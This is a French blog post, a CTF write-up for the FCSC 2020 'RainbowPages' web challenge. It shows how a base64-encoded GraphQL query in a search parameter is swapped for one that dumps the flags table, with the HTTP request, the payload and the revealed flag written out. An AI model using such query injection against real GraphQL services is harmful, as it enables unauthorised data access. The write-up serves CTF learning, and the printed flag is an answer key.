<!DOCTYPE html>
<html lang=" en "><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Writeup - FCSC-2020 - Web - RainbowPages | Vixepti</title>
<meta name="generator" content="Jekyll v4.0.1" />
<meta property="og:title" content="Writeup - FCSC-2020 - Web - RainbowPages" />
<meta name="author" content="Vixepti" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Writeup sur l’épreuve RainbowPages du France Cybersecurity Challenge 2020." />
<meta property="og:description" content="Writeup sur l’épreuve RainbowPages du France Cybersecurity Challenge 2020." />
<link rel="canonical" href="https://vixepti.fr/writeup/2020/05/05/fcsc-2020-writeup-rainbowpages.html" />
<meta property="og:url" content="https://vixepti.fr/writeup/2020/05/05/fcsc-2020-writeup-rainbowpages.html" />
<meta property="og:site_name" content="Vixepti" />
<meta property="og:image" content="https://vixepti.fr/assets/2020/05/FCSC.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-05-05T19:00:11+02:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="https://vixepti.fr/assets/2020/05/FCSC.png" />
<meta property="twitter:title" content="Writeup - FCSC-2020 - Web - RainbowPages" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Vixepti"},"dateModified":"2020-05-05T19:00:11+02:00","datePublished":"2020-05-05T19:00:11+02:00","description":"Writeup sur l’épreuve RainbowPages du France Cybersecurity Challenge 2020.","headline":"Writeup - FCSC-2020 - Web - RainbowPages","image":"https://vixepti.fr/assets/2020/05/FCSC.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://vixepti.fr/writeup/2020/05/05/fcsc-2020-writeup-rainbowpages.html"},"url":"https://vixepti.fr/writeup/2020/05/05/fcsc-2020-writeup-rainbowpages.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://vixepti.fr/feed.xml" title="Vixepti" /><!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id="></script>
<script>
  /* global dataLayer */
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', '');
</script></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Vixepti</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">À propos</a><a class="page-link" href="/categories/">Catégories</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
        <div class="wrapper">
            <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Writeup - FCSC-2020 - Web - RainbowPages</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2020-05-05T19:00:11+02:00" itemprop="datePublished">May 5, 2020
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">Vixepti</span></span></p>
      <hr>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>Writeup sur l’épreuve <em>RainbowPages</em> du <em>France Cybersecurity Challenge 2020</em>.<!--more--></p>

<h1 id="énoncé">Énoncé</h1>
<blockquote>
  <p>Nous avons développé une plateforme de recherche de cuisiniers. Venez la tester !</p>
</blockquote>

<p style="text-align: center;"><img src="/assets/2020/05/rainbowpages-homepage.png" alt="RainbowPages Homepage" /></p>

<h1 id="solution">Solution</h1>

<p>La page permet donc de chercher des chefs cuisiniers. Je lance une recherche :</p>

<figure class="highlight"><pre><code class="language-generic" data-lang="generic">GET /index.php?search=eyBhbGxDb29rcyAoZmlsdGVyOiB7IGZpcnN0bmFtZToge2xpa2U6ICIldGglIn19KSB7IG5vZGVzIHsgZmlyc3RuYW1lLCBsYXN0bmFtZSwgc3BlY2lhbGl0eSwgcHJpY2UgfX19 HTTP/1.1
Host: challenges2.france-cybersecurity-challenge.fr:5006
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: */*
Referer: http://challenges2.france-cybersecurity-challenge.fr:5006/
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=a6404b49723f89736210beb430d00106; session=eyJjc3JmX3Rva2VuIjoiMDQ3MzE1YjUzMTBjNGExODAyNmZmMTBkYjUwZTc5NGU1ZDI0MDVlMCJ9.XrEQkA.RHMeWiihOb4wktyg3nzR_e9Exn8</code></pre></figure>

<p>Je remarque un paramètre <em>GET</em> nommé <em>search</em> :</p>

<blockquote>
  <p>eyBhbGxDb29rcyAoZmlsdGVyOiB7IGZpcnN0bmFtZToge2xpa2U6ICIldGglIn19KSB7IG5vZGVzIHsgZmlyc3RuYW1lLCBsYXN0bmFtZSwgc3BlY2lhbGl0eSwgcHJpY2UgfX19</p>
</blockquote>

<p>Décodé depuis la base64 :</p>

<blockquote>
  <p>{ allCooks (filter: { firstname: {like: “%th%”}}) { nodes { firstname, lastname, speciality, price }}}</p>
</blockquote>

<p>On a donc affaire a graphQl, et je peux donc faire mes requêtes dans ce paramètre en base64 :</p>

<blockquote>
  <p>{ allFlags { nodes { flag }}}</p>
</blockquote>

<p>En base64 ça donne :</p>

<blockquote>
  <p>eyBhbGxGbGFncyB7IG5vZGVzIHsgZmxhZyB9fX0K</p>
</blockquote>

<p>Je lance donc une requête sur : http://challenges2.france-cybersecurity-challenge.fr:5006/?search=eyBhbGxGbGFncyB7IG5vZGVzIHsgZmxhZyB9fX0K</p>

<p>Et j’obtiens comme réponse :</p>

<figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="p">{</span><span class="nl">"data"</span><span class="p">:{</span><span class="nl">"allFlags"</span><span class="p">:{</span><span class="nl">"nodes"</span><span class="p">:[{</span><span class="nl">"flag"</span><span class="p">:</span><span class="s2">"FCSC{1ef3c5c3ac3c56eb178bafea15b07b82c4a0ea8184d76a722337dca108add41a}"</span><span class="p">}]}}}</span></code></pre></figure>

<h1 id="flag">Flag</h1>

<p>Le flag est donc : <strong><em>FCSC{1ef3c5c3ac3c56eb178bafea15b07b82c4a0ea8184d76a722337dca108add41a}</em></strong></p>

  </div>

  
    <hr><br>
    <span>Tags :</span>
    <div class="tags">
      <ul>
        
          <li><span class="tag">FCSC</span></li>    
        
          <li><span class="tag">ctf</span></li>    
        
          <li><span class="tag">writeup</span></li>    
        
          <li><span class="tag">web</span></li>    
        
      </ul>
    </div>
  <a class="u-url" href="/writeup/2020/05/05/fcsc-2020-writeup-rainbowpages.html" hidden></a>

  
</article>

        </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Vixepti</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Vixepti</li><li><a class="u-email" href="mailto:contact@vixepti.fr">contact@vixepti.fr</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/vixepti"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">vixepti</span></a></li><li><a href="https://www.twitter.com/vixepti"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">vixepti</span></a></li><li><a href="https://youtube.com/vixepti"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#youtube"></use></svg> <span class="username">vixepti</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>Administration systèmes et réseaux, Sécurité informatique, Hacking, Bricolage et autres joyeusetés...</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>